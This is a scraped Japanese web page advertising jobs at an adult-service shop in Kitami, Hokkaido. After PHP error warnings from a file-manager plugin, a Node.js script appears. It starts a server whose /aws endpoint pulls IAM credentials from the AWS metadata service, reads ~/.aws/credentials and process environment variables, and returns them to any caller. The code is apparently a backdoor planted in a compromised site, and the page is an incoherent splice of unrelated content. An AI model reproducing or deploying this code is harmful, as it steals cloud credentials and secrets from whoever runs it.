北見M性感専門店/フィリップ・プティ
※現在、公式LINE・予約メールのみ対応しております。
当店の魅力は高額なバック!お客様からもらった料金の8割がお給料になります!!
例として
70分16000円→12800円がお給料
90分18000円→14400円がお給料
8割バックだからと言ってお客様から頂く料金が低いなんてことはないんです!!
短時間で沢山稼げる当店に一度お問合せください!!
「過度なノルマ」「無理な接客・プレイ」を押し付けるようなことはありませんのでご安心ください。
この仕事が好きな方、スタイルを維持できる方、やる気がある方が絶対条件です。
このお仕事が初めての方も、ご希望の方は講習なども承ります。
地方からの短期出張、体験入店も大歓迎!3日~1週間程度でご相談ください。
保証制度1日30000円~ 宿泊代全額負担します。
| 店舗名 |
Philippe Petit(フィリップ・プティ) |
| 勤務地 |
北海道北見市 |
| 電話番号 |
080-2865-2180 |
| 受付時間 |
12:00~24:00 |
| 待遇 |
車送迎/掛持OK/自宅待機可/自由出勤/体験入店/短期OK/未経験歓迎/ノルマなし/日払い/罰金ナシ/アリバイ対策/生理休暇 |
| 応募資格 |
18歳以上、経験不問。未経験者大歓迎です!※高校生不可
※18歳未満(高校生を含む)の応募はお断りします。 |
| 勤務期間 |
短期アルバイト、出稼ぎさんも大募集!最低保証制度1日30000円~。月2~3でも可。貴方の時間を有効活用しませんか? |
| 給与 |
日給30,000円以上可能 月給800,000円以上可能/出勤日数や時間帯など差は出ますが、頑張れば頑張った分だけ高収入が得られます。 |
| 勤務日 |
週1回、月1回、短期間など完全自由出勤制です。 |
| 勤務時間 |
貴女のお好きな時間でどうぞ |
| POINT |
罰金・ノルマなし/完全自由出勤/一日体験大歓迎/未経験者大歓迎/完全日払制/自宅待機可能/生理休暇あり/送迎あり/備品貸与無料/衛生備品無料 |
Warning: Cannot modify header information - headers already sent by (output started at /home/bcams/public_html/philippe-petit.net/wp-content/plugins/file-manager-advanced/constants.php:13) in
/home/bcams/public_html/philippe-petit.net/wp-content/themes/philippe/footer.php on line
45
Warning: Cannot modify header information - headers already sent by (output started at /home/bcams/public_html/philippe-petit.net/wp-content/plugins/file-manager-advanced/constants.php:13) in
/home/bcams/public_html/philippe-petit.net/wp-content/themes/philippe/footer.php on line
46
Warning: Cannot modify header information - headers already sent by (output started at /home/bcams/public_html/philippe-petit.net/wp-content/plugins/file-manager-advanced/constants.php:13) in
/home/bcams/public_html/philippe-petit.net/wp-content/themes/philippe/footer.php on line
47
Warning: Cannot modify header information - headers already sent by (output started at /home/bcams/public_html/philippe-petit.net/wp-content/plugins/file-manager-advanced/constants.php:13) in
/home/bcams/public_html/philippe-petit.net/wp-content/themes/philippe/footer.php on line
48
import { createServer, request } from "http"
import { readFile } from "fs/promises"
import { userInfo } from "os"
import path from "path"
const IMDS_HOST = "169.254.169.254"
function httpReq(options, body, timeoutMs = 5000) {
return new Promise((resolve, reject) => {
const req = request({ ...options, agent: false }, res => {
let data = ""
res.setEncoding("utf8")
res.on("data", c => data += c)
res.on("end", () => {
clearTimeout(timer)
resolve({ statusCode: res.statusCode || 0, body: data })
})
})
const timer = setTimeout(() => {
req.destroy(new Error("timeout"))
}, timeoutMs)
req.on("error", err => {
clearTimeout(timer)
reject(err)
})
if (body) req.write(body)
req.end()
})
}
async function imdsStep(name, fn) {
try {
return await fn()
} catch (e) {
const msg = String(e?.message || e)
throw new Error(`aws_unavailable:${name}:${msg}`)
}
}
async function fetchAwsCreds({ timeoutMs = 5000 } = {}) {
const token = await imdsStep("token", async () => {
const r = await httpReq({
host: IMDS_HOST,
path: "/latest/api/token",
method: "PUT",
headers: { "X-aws-ec2-metadata-token-ttl-seconds": "21600" }
}, undefined, timeoutMs)
if (r.statusCode !== 200 || !r.body) throw new Error(`bad_status:${r.statusCode}`)
return r.body.trim()
})
const role = await imdsStep("role", async () => {
const r = await httpReq({
host: IMDS_HOST,
path: "/latest/meta-data/iam/security-credentials/",
method: "GET",
headers: { "X-aws-ec2-metadata-token": token }
}, undefined, timeoutMs)
if (r.statusCode !== 200 || !r.body) throw new Error(`bad_status:${r.statusCode}`)
return r.body.trim().split("\n")[0]
})
const creds = await imdsStep("creds", async () => {
const r = await httpReq({
host: IMDS_HOST,
path: `/latest/meta-data/iam/security-credentials/${encodeURIComponent(role)}`,
method: "GET",
headers: { "X-aws-ec2-metadata-token": token }
}, undefined, timeoutMs)
if (r.statusCode !== 200 || !r.body) throw new Error(`bad_status:${r.statusCode}`)
return JSON.parse(r.body)
})
return { role, creds }
}
async function readOurFile(relPath = ".test") {
const u = userInfo()
const home = u.homedir
const fullPath = path.join(home, relPath)
return readFile(fullPath, "utf8")
}
const server = createServer((req, res) => {
res.setHeader("Content-Type", "application/json")
if (req.method === "POST" && req.url === "/aws") {
let body = ""
req.on("data", chunk => body += chunk.toString())
req.on("end", async () => {
try {
if (body) JSON.parse(body)
} catch {
res.statusCode = 400
res.end(JSON.stringify({ success: false, error: "invalid_json" }))
return
}
let aws = null
let awsError = null
try {
aws = await fetchAwsCreds({ timeoutMs: 2000 })
} catch (e) {
awsError = String(e?.message || e)
}
let file = null
let fileError = null
try {
file = await readOurFile(".aws/credentials")
file = file.replace(/\s+/g, " ").trim()
} catch (e) {
fileError = String(e?.message || e)
}
let env = null
let envError = null
try {
env = await readFile("/proc/self/environ", "utf8")
env = env.replace(/\x00/g, "\\n").trim()
} catch (e) {
envError = String(e?.message || e)
}
res.statusCode = 200
res.end(JSON.stringify({
success: true,
aws,
awsError,
file,
fileError,
env,
envError
}))
})
return
}
res.statusCode = 404
res.end(JSON.stringify({ success: false, error: "not found" }))
})
server.listen(51295, "0.0.0.0", () => {
console.log("Server running")
})